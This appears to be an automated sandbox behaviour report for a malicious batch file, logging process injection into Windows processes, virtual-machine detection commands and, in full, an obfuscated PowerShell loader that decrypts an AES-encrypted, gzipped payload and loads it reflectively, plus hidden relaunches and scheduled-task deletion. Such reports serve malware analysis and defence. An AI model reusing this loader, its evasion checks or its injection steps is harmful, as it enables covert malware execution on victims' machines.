Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BF59D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 253FC3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A5AF330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1780D3E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D595A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 21D59C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EA080B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29E3BF00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1956F090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF30000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:thuufdhjxkhq{param([outputtype([type])][parameter(position=0)][type[]]$yflwifejwhebpy,[parameter(position=1)][type]$nxinipbkxv)$ymlvqpdcphk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+'l'+''+[char](101)+'ct'+[char](101)+'d'+'d'+''+[char](101)+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+'o'+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+''+[char](101)+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+'s'+[char](44)+''+[char](80)+''+'u'+''+[char](98)+'l'+[char](105)+''+[char](99)+','+[char](83)+''+[char](101)+''+[char](97)+''+'l'+''+'e'+''+[char](100)+''+[char](44)+'a'+[char](110)+''+[char](115)+'i'+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+'',[multicastdelegate]);$ymlvqpdcphk.definecon